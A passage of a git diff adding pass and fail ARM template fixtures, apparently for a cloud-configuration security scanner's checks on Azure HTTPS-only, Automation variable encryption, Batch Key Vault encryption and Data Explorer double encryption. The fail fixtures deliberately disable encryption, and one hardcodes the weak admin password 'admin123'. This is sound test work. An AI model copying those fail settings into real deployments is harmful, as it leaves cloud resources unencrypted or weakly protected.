+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass.json b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass.json
new file mode 100644
index 00000000000..6897fb611b1
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites",
+      "apiVersion": "2022-09-01",
+      "name": "pass",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": true,
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "is try string to app service disallow cors"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": false,
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass2.json b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass2.json
new file mode 100644
index 00000000000..e1303d3339e
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppServiceSlotHTTPSOnly/pass2.json
@@ -0,0 +1,330 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "webAppName": {
+      "type": "string",
+      "defaultValue": "AzureLinuxApp",
+      "metadata": {
+        "description": "Base name of the resource such as web app name and app service plan "
+      },
+      "minLength": 2
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "S1",
+      "metadata": {
+        "description": "The SKU of App Service Plan "
+      }
+    },
+    "linuxFxVersion": {
+      "type": "string",
+      "defaultValue": "php|7.0",
+      "metadata": {
+        "description": "The Runtime stack of current web app"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "webAppPortalName": "[concat(parameters('webAppName'), '-webapp')]",
+    "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Web/sites/slots",
+      "apiVersion": "2022-09-01",
+      "name": "pass2",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "kind": "string",
+      "extendedLocation": {
+        "name": "string"
+      },
+      "identity": {
+        "type": "string",
+        "userAssignedIdentities": {}
+      },
+      "properties": {
+        "clientAffinityEnabled": "bool",
+        "clientCertEnabled": "bool",
+        "clientCertExclusionPaths": "string",
+        "clientCertMode": "string",
+        "cloningInfo": {
+          "appSettingsOverrides": {},
+          "cloneCustomHostNames": "bool",
+          "cloneSourceControl": "bool",
+          "configureLoadBalancing": "bool",
+          "correlationId": "string",
+          "hostingEnvironment": "string",
+          "overwrite": "bool",
+          "sourceWebAppId": "string",
+          "sourceWebAppLocation": "string",
+          "trafficManagerProfileId": "string",
+          "trafficManagerProfileName": "string"
+        },
+        "containerSize": "int",
+        "customDomainVerificationId": "string",
+        "dailyMemoryTimeQuota": "int",
+        "enabled": "bool",
+        "hostingEnvironmentProfile": {
+          "id": "string"
+        },
+        "hostNamesDisabled": "bool",
+        "hostNameSslStates": [
+          {
+            "hostType": "string",
+            "name": "string",
+            "sslState": "string",
+            "thumbprint": "string",
+            "toUpdate": "bool",
+            "virtualIP": "string"
+          }
+        ],
+        "httpsOnly": true,
+        "hyperV": "bool",
+        "isXenon": "bool",
+        "keyVaultReferenceIdentity": "string",
+        "managedEnvironmentId": "string",
+        "publicNetworkAccess": "string",
+        "redundancyMode": "string",
+        "reserved": "bool",
+        "scmSiteAlsoStopped": "bool",
+        "serverFarmId": "string",
+        "siteConfig": {
+          "acrUseManagedIdentityCreds": "bool",
+          "acrUserManagedIdentityID": "string",
+          "alwaysOn": "bool",
+          "apiDefinition": {
+            "url": "string"
+          },
+          "apiManagementConfig": {
+            "id": "string"
+          },
+          "appCommandLine": "string",
+          "appSettings": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "autoHealEnabled": "bool",
+          "autoHealRules": {
+            "actions": {
+              "actionType": "string",
+              "customAction": {
+                "exe": "string",
+                "parameters": "string"
+              },
+              "minProcessExecutionTime": "string"
+            },
+            "triggers": {
+              "privateBytesInKB": "int",
+              "requests": {
+                "count": "int",
+                "timeInterval": "string"
+              },
+              "slowRequests": {
+                "count": "int",
+                "path": "string",
+                "timeInterval": "string",
+                "timeTaken": "string"
+              },
+              "slowRequestsWithPath": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "timeInterval": "string",
+                  "timeTaken": "string"
+                }
+              ],
+              "statusCodes": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "status": "int",
+                  "subStatus": "int",
+                  "timeInterval": "string",
+                  "win32Status": "int"
+                }
+              ],
+              "statusCodesRange": [
+                {
+                  "count": "int",
+                  "path": "string",
+                  "statusCodes": "string",
+                  "timeInterval": "string"
+                }
+              ]
+            }
+          },
+          "autoSwapSlotName": "string",
+          "azureStorageAccounts": {},
+          "connectionStrings": [
+            {
+              "connectionString": "string",
+              "name": "string",
+              "type": "string"
+            }
+          ],
+          "cors": {
+            "allowedOrigins": [
+              "string"
+            ],
+            "supportCredentials": "bool"
+          },
+          "defaultDocuments": [
+            "string"
+          ],
+          "detailedErrorLoggingEnabled": "bool",
+          "documentRoot": "string",
+          "elasticWebAppScaleLimit": "int",
+          "experiments": {
+            "rampUpRules": [
+              {
+                "actionHostName": "string",
+                "changeDecisionCallbackUrl": "string",
+                "changeIntervalInMinutes": "int",
+                "changeStep": "int",
+                "maxReroutePercentage": "int",
+                "minReroutePercentage": "int",
+                "name": "string",
+                "reroutePercentage": "int"
+              }
+            ]
+          },
+          "ftpsState": "string",
+          "functionAppScaleLimit": "int",
+          "functionsRuntimeScaleMonitoringEnabled": "bool",
+          "handlerMappings": [
+            {
+              "arguments": "string",
+              "extension": "string",
+              "scriptProcessor": "string"
+            }
+          ],
+          "healthCheckPath": "string",
+          "http20Enabled": "bool",
+          "httpLoggingEnabled": "bool",
+          "ipSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "ipSecurityRestrictionsDefaultAction": "string",
+          "javaContainer": "string",
+          "javaContainerVersion": "string",
+          "javaVersion": "string",
+          "keyVaultReferenceIdentity": "string",
+          "limits": {
+            "maxDiskSizeInMb": "int",
+            "maxMemoryInMb": "int",
+            "maxPercentageCpu": "int"
+          },
+          "linuxFxVersion": "string",
+          "loadBalancing": "string",
+          "localMySqlEnabled": "bool",
+          "logsDirectorySizeLimit": "int",
+          "managedPipelineMode": "string",
+          "managedServiceIdentityId": "int",
+          "metadata": [
+            {
+              "name": "string",
+              "value": "string"
+            }
+          ],
+          "minimumElasticInstanceCount": "int",
+          "minTlsVersion": "string",
+          "netFrameworkVersion": "string",
+          "nodeVersion": "string",
+          "numberOfWorkers": "int",
+          "phpVersion": "string",
+          "powerShellVersion": "string",
+          "preWarmedInstanceCount": "int",
+          "publicNetworkAccess": "string",
+          "publishingUsername": "string",
+          "push": {
+            "kind": "string",
+            "properties": {
+              "dynamicTagsJson": "string",
+              "isPushEnabled": "bool",
+              "tagsRequiringAuth": "string",
+              "tagWhitelistJson": "string"
+            }
+          },
+          "pythonVersion": "string",
+          "remoteDebuggingEnabled": "bool",
+          "remoteDebuggingVersion": "string",
+          "requestTracingEnabled": "bool",
+          "requestTracingExpirationTime": "string",
+          "scmIpSecurityRestrictions": [
+            {
+              "action": "string",
+              "description": "string",
+              "headers": {},
+              "ipAddress": "string",
+              "name": "string",
+              "priority": "int",
+              "subnetMask": "string",
+              "subnetTrafficTag": "int",
+              "tag": "string",
+              "vnetSubnetResourceId": "string",
+              "vnetTrafficTag": "int"
+            }
+          ],
+          "scmIpSecurityRestrictionsDefaultAction": "string",
+          "scmIpSecurityRestrictionsUseMain": "bool",
+          "scmMinTlsVersion": "string",
+          "scmType": "string",
+          "tracingOptions": "string",
+          "use32BitWorkerProcess": "bool",
+          "virtualApplications": [
+            {
+              "physicalPath": "string",
+              "preloadEnabled": "bool",
+              "virtualDirectories": [
+                {
+                  "physicalPath": "string",
+                  "virtualPath": "string"
+                }
+              ],
+              "virtualPath": "string"
+            }
+          ],
+          "vnetName": "string",
+          "vnetPrivatePortsCount": "int",
+          "vnetRouteAllEnabled": "bool",
+          "websiteTimeZone": "string",
+          "webSocketsEnabled": "bool",
+          "windowsFxVersion": "string",
+          "xManagedServiceIdentityId": "int"
+        },
+        "storageAccountRequired": "bool",
+        "virtualNetworkSubnetId": "string",
+        "vnetContentShareEnabled": "bool",
+        "vnetImagePullEnabled": "bool",
+        "vnetRouteAllEnabled": "bool"
+      }
+    }
+  ]
+}
+
diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/fail.json b/tests/arm/checks/resource/example_AutomationEncrypted/fail.json
new file mode 100644
index 00000000000..51f1623379f
--- /dev/null
+++ b/tests/arm/checks/resource/example_AutomationEncrypted/fail.json
@@ -0,0 +1,22 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {},
+    "variables": {},
+    "resources": [
+        {
+            "type": "Microsoft.Automation/automationAccounts/variables",
+            "apiVersion": "2020-01-13-preview",
+            "name": "fail",
+            "properties": {
+                "name": "tfex-example-var",
+                "value": "Hello, Arm Basic Test.",
+                "isEncrypted": false
+            },
+            "dependsOn": [
+                "[resourceId('Microsoft.Automation/automationAccounts', 'example')]"
+            ]
+        }
+    ],
+    "outputs": {}
+}
diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json b/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json
new file mode 100644
index 00000000000..b416528b505
--- /dev/null
+++ b/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json
@@ -0,0 +1,21 @@
+{
+    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+    "contentVersion": "1.0.0.0",
+    "parameters": {},
+    "variables": {},
+    "resources": [
+        {
+            "type": "Microsoft.Automation/automationAccounts/variables",
+            "apiVersion": "2020-01-13-preview",
+            "name": "fail1",
+            "properties": {
+                "name": "tfex-example-var",
+                "value": "Hello, Arm Basic Test."
+            },
+            "dependsOn": [
+                "[resourceId('Microsoft.Automation/automationAccounts', 'example')]"
+            ]
+        }
+    ],
+    "outputs": {}
+}
diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/pass.json b/tests/arm/checks/resource/example_AutomationEncrypted/pass.json
new file mode 100644
index 00000000000..cca3b5d5366
--- /dev/null
+++ b/tests/arm/checks/resource/example_AutomationEncrypted/pass.json
@@ -0,0 +1,22 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {},
+  "variables": {},
+  "resources": [
+    {
+      "type": "Microsoft.Automation/automationAccounts/variables",
+      "apiVersion": "2020-01-13-preview",
+      "name": "pass",
+      "properties": {
+        "name": "tfex-example-var",
+        "value": "Hello, Arm Basic Test.",
+        "isEncrypted": true
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Automation/automationAccounts', 'example')]"
+      ]
+    }
+  ],
+  "outputs": {}
+}
diff --git a/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json
new file mode 100644
index 00000000000..9336aeba462
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json
@@ -0,0 +1,106 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.26.54.24096",
+      "templateHash": "5620168434409602803"
+    }
+  },
+  "parameters": {
+    "batchAccountName": {
+      "type": "string",
+      "defaultValue": "[format('{0}batch', toLower(uniqueString(resourceGroup().id)))]",
+      "metadata": {
+        "description": "Batch Account Name"
+      }
+    },
+    "storageAccountsku": {
+      "type": "string",
+      "defaultValue": "Standard_LRS",
+      "allowedValues": [
+        "Standard_LRS",
+        "Standard_GRS",
+        "Standard_ZRS",
+        "Premium_LRS"
+      ],
+      "metadata": {
+        "description": "Storage Account type"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "storageAccountName": "[format('{0}storage', uniqueString(resourceGroup().id))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2023-01-01",
+      "name": "[variables('storageAccountName')]",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('storageAccountsku')]"
+      },
+      "kind": "StorageV2",
+      "tags": {
+        "ObjectName": "[variables('storageAccountName')]"
+      },
+      "properties": {
+        "minimumTlsVersion": "TLS1_2",
+        "allowBlobPublicAccess": false,
+        "networkAcls": {
+          "defaultAction": "Deny"
+        },
+        "supportsHttpsTrafficOnly": true
+      }
+    },
+    {
+      "type": "Microsoft.Batch/batchAccounts",
+      "apiVersion": "2024-02-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "tags": {
+        "ObjectName": "[parameters('batchAccountName')]"
+      },
+      "properties": {
+        "autoStorage": {
+          "storageAccountId": "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]"
+        }
+
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]"
+      ]
+    }
+  ],
+  "outputs": {
+    "storageAccountName": {
+      "type": "string",
+      "value": "[variables('storageAccountName')]"
+    },
+    "batchAccountName": {
+      "type": "string",
+      "value": "[parameters('batchAccountName')]"
+    },
+    "location": {
+      "type": "string",
+      "value": "[parameters('location')]"
+    },
+    "resourceGroupName": {
+      "type": "string",
+      "value": "[resourceGroup().name]"
+    },
+    "resourceId": {
+      "type": "string",
+      "value": "[resourceId('Microsoft.Batch/batchAccounts', parameters('batchAccountName'))]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json
new file mode 100644
index 00000000000..e0cf6278352
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json
@@ -0,0 +1,109 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.26.54.24096",
+      "templateHash": "5620168434409602803"
+    }
+  },
+  "parameters": {
+    "batchAccountName": {
+      "type": "string",
+      "defaultValue": "[format('{0}batch', toLower(uniqueString(resourceGroup().id)))]",
+      "metadata": {
+        "description": "Batch Account Name"
+      }
+    },
+    "storageAccountsku": {
+      "type": "string",
+      "defaultValue": "Standard_LRS",
+      "allowedValues": [
+        "Standard_LRS",
+        "Standard_GRS",
+        "Standard_ZRS",
+        "Premium_LRS"
+      ],
+      "metadata": {
+        "description": "Storage Account type"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "storageAccountName": "[format('{0}storage', uniqueString(resourceGroup().id))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Storage/storageAccounts",
+      "apiVersion": "2023-01-01",
+      "name": "[variables('storageAccountName')]",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('storageAccountsku')]"
+      },
+      "kind": "StorageV2",
+      "tags": {
+        "ObjectName": "[variables('storageAccountName')]"
+      },
+      "properties": {
+        "minimumTlsVersion": "TLS1_2",
+        "allowBlobPublicAccess": false,
+        "networkAcls": {
+          "defaultAction": "Deny"
+        },
+        "supportsHttpsTrafficOnly": true
+      }
+    },
+    {
+      "type": "Microsoft.Batch/batchAccounts",
+      "apiVersion": "2024-02-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "tags": {
+        "ObjectName": "[parameters('batchAccountName')]"
+      },
+      "properties": {
+        "autoStorage": {
+          "storageAccountId": "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]"
+        },
+        "keyVaultReference": {
+      "id": "test",
+      "url": "https://test.com"
+    }
+      },
+      "dependsOn": [
+        "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]"
+      ]
+    }
+  ],
+  "outputs": {
+    "storageAccountName": {
+      "type": "string",
+      "value": "[variables('storageAccountName')]"
+    },
+    "batchAccountName": {
+      "type": "string",
+      "value": "[parameters('batchAccountName')]"
+    },
+    "location": {
+      "type": "string",
+      "value": "[parameters('location')]"
+    },
+    "resourceGroupName": {
+      "type": "string",
+      "value": "[resourceGroup().name]"
+    },
+    "resourceId": {
+      "type": "string",
+      "value": "[resourceId('Microsoft.Batch/batchAccounts', parameters('batchAccountName'))]"
+    }
+  }
+}
diff --git a/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/fail.json b/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/fail.json
new file mode 100644
index 00000000000..3c857a7aaa2
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/fail.json
@@ -0,0 +1,25 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "apiVersion": "2018-06-01",
+      "type": "Microsoft.Kusto/clusters",
+      "location": "West Europe",
+      "name": "fail",
+      "sku": {
+        "name": "B_Gen5_2",
+        "size": "5120"
+      },
+      "properties": {
+        "version": "10.3",
+        "administratorLogin": "admin",
+        "administratorLoginPassword": "admin123",
+        "enableDoubleEncryption": false,
+        "storageProfile": {
+          "storageMB": "5120"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/pass.json b/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/pass.json
new file mode 100644
index 00000000000..051774bb852
--- /dev/null
+++ b/tests/arm/checks/resource/example_AzureDataExplorerDoubleEncryptionEnabled/pass.json
@@ -0,0 +1,25 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
